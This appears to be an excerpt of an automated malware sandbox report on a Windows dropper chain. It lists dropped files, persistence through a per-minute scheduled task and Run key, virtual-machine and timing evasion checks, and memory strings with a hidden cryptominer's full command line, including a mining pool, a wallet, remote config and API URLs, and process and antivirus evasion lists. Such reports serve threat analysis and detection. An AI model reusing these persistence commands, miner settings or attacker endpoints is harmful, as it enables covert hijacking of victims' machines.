                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pythoncom311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA1.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psutil_windows.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmorph.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeFile created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_cpuid_c.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_modexp.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD5.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA256.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zjFtdxQ[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Roaming\is-VSE52.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_isdecmp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_x25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA1.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ec_ws.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_x25519.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des3.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\python3.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_modexp.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingcms.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_Salsa20.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingtk.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD2.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA384.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_MD4.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_arc2.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp File created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_shfoldr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA384.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp File created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_isdecmp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpuid_c.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\charset_normalizer\md.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ofb.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_strxor.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libffi-8.dll
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_portable.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_clmul.pyd
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_RIPEMD160.pyd
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp File created: C:\Users\user\AppData\Local\Temp\is-RCEII.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2b.pyd
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_webp.cp311-win_amd64.pyd
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe File created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe File created: C:\Windows\Temp\aodefromlpug.sys

                          Boot Survival

                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe
                          Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Window searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Window searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Window searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Window searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Window searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NzL6O1Q
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "RNRFMTFS"

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-11982
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_1-9686
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe System information queried: FirmwareTableInformation
                          Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
                          Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe File opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: svchost.exe, 00000035.00000002.3340783820.0000022088280000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXTTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHPVOHVTBTKKQQPCGVY
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: S="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="AODEFROMLPUG.SYS" --RANDOMX-NO-RDMSR --CINIT-REMOTE-CONFIG="HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXT" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --NICEHASH --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="VOHVTBTKKQQPCGVY"
                          Source: svchost.exe, 00000035.00000003.2524262269.000002208828E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WOO097878781.WIN46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJBSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMSMPENG.EXE,V3SVC.EXE,VSSERV.EXE,ASHDISP.EXE,AVGNSX.EXE,AVGUARD.EXE,VSSERV.EXE,BDAGENT.EXE,BULLGUARD.EXE,CMDAGENT.EXE,DWENGINE.EXE,A2SERVICE.EXE,EKRN.EXE,FSMA32.EXE,AVKCL.EXE,K7TSMNGR.EXE,AVP.EXE,MBAMSERVICE.EXE,MCSHIELD.EXE,NORTONSECURITY.EXE,PAVSRVX86.EXE,SAVSERVICE.EXE,COREFRAMEWORKHOST.EXE,SBAMSVC.EXE,VSMON.EXE,ARCASERVICE.EXE,SCANNERSERVER.EXE,NANOSVC.EXE,IKARUSGUARDX86.EXE,ZILLYASERVICE.EXE,SECUREAGEAPEX.EXE,IMMUNETPROTECT.EXE,WRSA.EXE,PANDADOME.EXE,CLAMD.EXE,360SAFE.EXE,QQPCTRAY.EXE,TOTALAVSERVICE.EXE,BAIDUSDTRAY.EXE,NPSSVC.EXE,CYSERV.EXE,VIPRETRAY.EXESTEALTH-FULLSCREENALGO
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Source: svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMMUNETPROTECT.EXEXETOTALAVSERVICE.EXEEEXEPROCESSHACKER.EXEEEXEE
                          Source: svchost.exe, 00000035.00000003.2524558763.000002208825E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=AODEFROMLPUG.SYS--RANDOMX-NO-RDMSR--CINIT-REMOTE-CONFIG=HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXT--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--NICEHASH--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=VOHVTBTKKQQPCGVY
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Source: svchost.exe, 00000035.00000002.3340783820.0000022088280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CHROME.EXEECHROME.EXEEXESECUREAGEAPEX.EXEEEXEEPROCESSHACKER.EXEEEXENZL6O1Q.EXEEE
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524262269.000002208828E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF56A second address: EBF56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028288 second address: 102829A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FC408FC8B14h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10564BD second address: 10564C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10564C2 second address: 10564C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
